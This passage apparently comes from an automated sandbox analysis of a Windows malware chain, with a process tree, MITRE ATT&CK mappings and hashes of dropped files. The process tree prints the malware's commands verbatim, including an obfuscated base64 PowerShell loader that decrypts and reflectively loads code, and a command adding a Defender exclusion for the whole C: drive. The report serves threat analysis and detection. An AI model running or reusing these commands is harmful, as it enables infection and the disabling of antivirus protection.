                              cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                              8⤵
                              • System Location Discovery: System Language Discovery
                              PID:7932
                            • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                              Passwords.com N
                              8⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:7988
                            • C:\Windows\SysWOW64\choice.exe
                              choice /d y /t 5
                              8⤵
                              • System Location Discovery: System Language Discovery
                              PID:8084
                        • C:\Users\Admin\AppData\Local\Temp\10381990101\TbV75ZR.exe
                          "C:\Users\Admin\AppData\Local\Temp\10381990101\TbV75ZR.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:5096
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                            7⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:6572
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 496
                              8⤵
                              • Program crash
                              PID:6280
                        • C:\Users\Admin\AppData\Local\Temp\10382000101\Rm3cVPI.exe
                          "C:\Users\Admin\AppData\Local\Temp\10382000101\Rm3cVPI.exe"
                          6⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5268
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10382011121\5YB5L4K.cmd"
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:8292
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10382011121\5YB5L4K.cmd"
                            7⤵
                            • System Location Discovery: System Language Discovery
                            PID:8348
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                              8⤵
                              • Blocklisted process makes network request
                              • Command and Scripting Interpreter: PowerShell
                              • Drops startup file
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: AddClipboardFormatListener
                              • Suspicious use of AdjustPrivilegeToken
                              PID:8416
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                                9⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:8796
                        • C:\Users\Admin\AppData\Local\Temp\10382020101\kO2IdCz.exe
                          "C:\Users\Admin\AppData\Local\Temp\10382020101\kO2IdCz.exe"
                          6⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          PID:8772
                          • C:\Windows\SYSTEM32\cmd.exe
                            cmd.exe /c 67e8f4de3ad1d.vbs
                            7⤵
                              PID:8836
                          • C:\Users\Admin\AppData\Local\Temp\10382030101\27239ed957.exe
                            "C:\Users\Admin\AppData\Local\Temp\10382030101\27239ed957.exe"
                            6⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:9348
                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                  C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                  1⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious behavior: EnumeratesProcesses
                  PID:392
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                  1⤵
                    PID:4604
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                    1⤵
                      PID:4676
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6572 -ip 6572
                      1⤵
                        PID:6316
                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:8112
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                        1⤵
                          PID:8860
                          • C:\Windows\system32\rundll32.exe
                            rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                            2⤵
                              PID:9040
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{b92db209-67d4-405c-b548-933a7614087e}\bec78fb7-cb82-4078-9c9f-9ecb49669c8a.cmd"
                            1⤵
                              PID:10312
                              • C:\Windows\system32\PING.EXE
                                ping 127.0.0.1 -n 1
                                2⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:10572
                              • C:\Windows\system32\PING.EXE
                                ping 127.0.0.1 -n 1
                                2⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:10676
                              • C:\Windows\system32\PING.EXE
                                ping 127.0.0.1 -n 1
                                2⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:10732
                              • C:\Windows\system32\PING.EXE
                                ping 127.0.0.1 -n 1
                                2⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:10784
                              • C:\Windows\system32\PING.EXE
                                ping 127.0.0.1 -n 1
                                2⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:10864
                              • C:\Windows\system32\PING.EXE
                                ping 127.0.0.1 -n 1
                                2⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:10936
                              • C:\Windows\system32\PING.EXE
                                ping 127.0.0.1 -n 1
                                2⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:11132
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v bec78fb7-cb82-4078-9c9f-9ecb49669c8a /f
                                2⤵
                                • Modifies registry key
                                PID:11228
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10236 -ip 10236
                              1⤵
                                PID:10536

                              Network

                              MITRE ATT&CK Enterprise v15

                              Reconnaissance

                              Resource Development

                              Initial Access

                              Execution

                              Command and Scripting Interpreter

                              1
                              T1059

                              PowerShell

                              1
                              T1059.001

                              Scheduled Task/Job

                              1
                              T1053

                              Scheduled Task

                              1
                              T1053.005

                              Persistence

                              Boot or Logon Autostart Execution

                              2
                              T1547

                              Registry Run Keys / Startup Folder

                              2
                              T1547.001

                              Create or Modify System Process

                              4
                              T1543

                              Windows Service

                              4
                              T1543.003

                              Pre-OS Boot

                              1
                              T1542

                              Bootkit

                              1
                              T1542.003

                              Scheduled Task/Job

                              1
                              T1053

                              Scheduled Task

                              1
                              T1053.005

                              Privilege Escalation

                              Boot or Logon Autostart Execution

                              2
                              T1547

                              Registry Run Keys / Startup Folder

                              2
                              T1547.001

                              Create or Modify System Process

                              4
                              T1543

                              Windows Service

                              4
                              T1543.003

                              Scheduled Task/Job

                              1
                              T1053

                              Scheduled Task

                              1
                              T1053.005

                              Defense Evasion

                              Impair Defenses

                              6
                              T1562

                              Disable or Modify Tools

                              5
                              T1562.001

                              Safe Mode Boot

                              1
                              T1562.009

                              Modify Registry

                              8
                              T1112

                              Pre-OS Boot

                              1
                              T1542

                              Bootkit

                              1
                              T1542.003

                              Virtualization/Sandbox Evasion

                              2
                              T1497

                              Credential Access

                              Unsecured Credentials

                              1
                              T1552

                              Credentials In Files

                              1
                              T1552.001

                              Discovery

                              Process Discovery

                              1
                              T1057

                              Query Registry

                              7
                              T1012

                              Remote System Discovery

                              1
                              T1018

                              System Information Discovery

                              5
                              T1082

                              System Location Discovery

                              1
                              T1614

                              System Language Discovery

                              1
                              T1614.001

                              System Network Configuration Discovery

                              1
                              T1016

                              Internet Connection Discovery

                              1
                              T1016.001

                              Virtualization/Sandbox Evasion

                              2
                              T1497

                              Lateral Movement

                              Collection

                              Data from Local System

                              1
                              T1005

                              Command and Control

                              Exfiltration

                              Impact

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                Filesize

                                2.0MB

                                MD5

                                95e078a0e59f8c398a46ad93b5ebcfe9

                                SHA1

                                53630fbe4996e7d1aca4a2c831ecc1e9b54042eb

                                SHA256

                                b8b6d14ab39b91234fb0553accc190fb055cb4fac966936c000f12f2be78a613

                                SHA512

                                1d64f814016d918f8026972efd7183e49447ee4a4a66abc1c58de0d3b94c694e260c8658dc9dbced4a9b5a58239510f89e4e2a3fee5e879b0bbb60d7cea63c98

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\BNB095SR\service[1].htm
                                Filesize

                                1B

                                MD5

                                cfcd208495d565ef66e7dff9f98764da

                                SHA1

                                b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                SHA256

                                5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                SHA512

                                31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\BNB095SR\soft[1]
                                Filesize

                                3.0MB

                                MD5

                                2cb4cdd698f1cbc9268d2c6bcd592077

                                SHA1

                                86e68f04bc99f21c9d6e32930c3709b371946165

                                SHA256

                                c89a0fea7c3850c8bf4b6a231a34cfb699c97783b1b2b1176070dd4d9cb4bd4a

                                SHA512

                                606216ce50d2c89f4700fd3f8853b09f5626615cac64bfe304c15524a908b4a220abed1a023b0f099d390a2e5b14e1dc4f94840aa398658188ad299c93939de3

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize

                                16KB

                                MD5

                                431fed9bb5678e5e69d59abf191696f3

                                SHA1

                                4d34114a0558197937e06859125b75ade68eaeaa

                                SHA256

                                90b002cd1145b686f96f8d0f9a460018581ba22e884a245b8fe8745b214bdd24

                                SHA512

                                21c2b9f331515c816bc2645ec4d0fafbec9cb45f5190ac881afc704608bf8ae45afa49b1b436296dd58003246eeb43de787cb0932c37d8c6de41be56513d7f44

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\33b8gs3a.default-release\activity-stream.discovery_stream.json
                                Filesize

                                24KB

                                MD5

                                79cf343dad949c7433c8df4abc395af3

                                SHA1

                                d538fd179a3418c970d5cb8cdad17d155b1f5046

                                SHA256

                                ff5d227254a50f1e73e5b2f385353a5d0f70fca6a88dbf63ea030ca3c0649e66

                                SHA512

                                c3bf57ca21cf0b1b3fd3a8e12f269d2f6977574b2aabec3d0ebdaed6ae9dd25e4afca872c7f1fb1d8a932b0190333d7ba1a2d9579eaecd6f7ae54abf7eaebace

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\33b8gs3a.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9
                                Filesize

                                13KB

                                MD5

                                995a6b155a178faff0d00d595b2e71b8

                                SHA1

                                90f7aec48f55d48625f8dfe4033ddf024da17421

                                SHA256

                                9c649ea21a176c58926914926acbcbae5b12bda34db81f7df21f771242c4da1a

                                SHA512

                                320c55317672817152defed1708d06eda04434cefa44f5f349af0d790ffdc51e5520074aa00dbf5c17c813c02f55b3a27c4b127c0d8068a60f220e572e61f315

                                Download Submit

                              • C:\Users\Admin\AppData\Local\TempPBKPZNSDRWLDYUI8SWVYQ6ZLSID6ESSG.EXE
                                Filesize

                                1.8MB

                                MD5

                                6ccf93c0cef65b2510ff1fcff52e7fb8

                                SHA1

                                3db6bf3e3f7ed0a0fb767b79171e9ad34c03b0d1

                                SHA256

                                8da34a9f000b0b4e40a66e3aa4739b089b55b26a95a0eb58cc0bff7d67ed8021

                                SHA512

                                757d0f599617574f2f08b8a1f252b9256b65c914c7f880479e86df9cdf39eb2bba1f4fcb9384d4915bd0fedc9cdbc7b5842cd95df8160d24a01e8d51ff836ae8

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\10381850101\cb1667a0ee.exe
                                Filesize

                                2.9MB

                                MD5

                                aa05ed038e333f17ef7004862f8b0c86

                                SHA1

                                78733f2d4cb5cf0ad14eac5fa9bcb4c570ef7ef1

                                SHA256

                                8a011207a0aa485819ff978ad7678acec6bddf2457531b08ad069a48e70d143b

                                SHA512

                                bbc4de35b8fbc9868f9c2536090c6c2dc9ba1180d5bccaf838db2c2a60f98f18791ffd40beb40c9ca9998cb214c9d6cb0306d8afd7bca43ca4f4d114f4db7ce3

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\10381860101\98aa894168.exe
                                Filesize

                                1.7MB

                                MD5

                                0ffdfe75f11f8db0592eeec2c76cfad8

                                SHA1

                                ee7dcdaa0d4ffcbc369b7cca93e6c506ed59555c

                                SHA256

                                e87bbd322a31b45429d71bb431b860860ca09806f228471937d16fcae1133389

                                SHA512

                                eca5bdaaef3a1a72c6845476666251594891b719b5ab24bc2909c16fce6c9d164b256431277231bfe018a860abf0c57f07513ea037335650624408b468282230

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\10381870101\1ddd25bc5b.exe
                                Filesize

                                947KB

                                MD5

                                ceb9486a31fee239bad9951cf311e4f3

                                SHA1

                                5822f1746c8ce55859d39158b5d749c354ea0b17

                                SHA256

                                b198a1ad49c7b4a1b1fc43168819bd452a6019627e387430be31a33e8557bcf0

                                SHA512

                                3c37609b0db631524fece9ee69cbcaeb6aa7307dc146fe985ccfe00fc338830f6a7d34f2d7c7033fb066df34a370504197b5a03abefa025e42c4b93e8baffe45

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\10381880101\19114c195b.exe
                                Filesize

                                1.7MB

                                MD5

                                4b764819554a815766d6d911ef2756c0

                                SHA1

                                342390f34a9dd537f1991dbbe6069889c2838872

                                SHA256

                                86cc5c80691e69d6fdc3a42a38604466f86d265d0f736095b2065a78705a199d

                                SHA512

                                0fe38ed6d510d3ffab3ed62be5db649d36e6e3be2f7fb7931b4afd765c22b0290b00458e5d8d7bf2b9915afe268221ed61f327ac095fd0442c44a3b289fe13dd

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\10381890101\2f56f74f53.exe
                                Filesize

                                1.8MB

                                MD5

                                242617c7d9c922457ad4ea64cb40f6ea

                                SHA1

                                9725d4a1e476d9fb9d3e0b495fa4796b250470ba

                                SHA256

                                f7fa8ca1c918f76a3b9057bde8cee2ce5bb6dda1b069cbfc531c513ab6b060c2

                                SHA512

                                f122a19107afd8d4914bf5997ad64c26468b0a1b2db8802a47345acd7e60d925a41cc4a2fa934a752b021ba7b8cefa886c16ca728da01ce21942d6e91675a6ab

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\10381900101\c9c7f0ab08.exe
                                Filesize

                                480KB

                                MD5

                                1c601dcb633a5a1ad3d903a746cf7e2e

                                SHA1

                                6d10ea6cbedab7320c3e1f806d65c9b869105c11

                                SHA256

                                960670b325ad49c1bf269c9816f2c254fa5371f96b3ad7371c5150c49591a3c7

                                SHA512

                                4c692251958acc9ed91170cd327644886d965802778558f0dd7894943cbb3d8dfc990f1ffc2549782503f72a97718469e37dee495adc89e8fef02601e2325cf7

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\10381900101\c9c7f0ab08.exe
                                Filesize

                                240KB

                                MD5

                                fdd55ad9190ca9a56c0d400d65b7504f

                                SHA1

                                cd2e1d9636fa035ec3c739a478b9f92bf3b52727

                                SHA256

                                79c986fd9c87542256a607eff10f5a2f84165b08bd9dd161e2d33e213607b487

                                SHA512

                                bea47ea7099e6922ffa60442e3f7010fdffa86e37a020e2fc30502b42a76ad5fbfd9780af988742b398fb9487744d4095912183157aa89ae40f31492b76e95cb

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\10381910101\47e237f09e.exe
                                Filesize

                                4.5MB

                                MD5

                                289e4ddcf0bf64afdb644fb575a8b1a5

                                SHA1

                                6213ebcbc71ccea7e065abd6c83ed51e90c28288

                                SHA256

                                7d254530f4e89834307333d738f71afe7a0dec12953f80a4fbfb4e03675910d5

                                SHA512

                                f4220a0288389ee49109dc569126eb827bba4204c53547e9e70dda23c27a7579bb8f2f43a1fba0e81305333679f1ce1d0eb794292c9a06157e7d19e0600d9784

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\10381920101\c754ced93a.exe
                                Filesize

                                4.3MB

                                MD5

                                4ea661c85a082117e59ea78f2f140a1c

                                SHA1

                                49940f31bc96b08d70c1ef56d010ea320f9bbb74

                                SHA256

                                389d6b90d016366fbe93940d9e4cc9594a5491c408cdc803766397012aee1a3a

                                SHA512

                                df3444c2a93ca62572d0f5640ece177973a3f9750952cc9d415d3dc03a0c14f66d3ce3d35f3c0ff44480809be8bf9218ae50cbddeeb4486e8850213a9330a394

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\10381930101\bc59f6effc.exe
                                Filesize

                                1.1MB

                                MD5

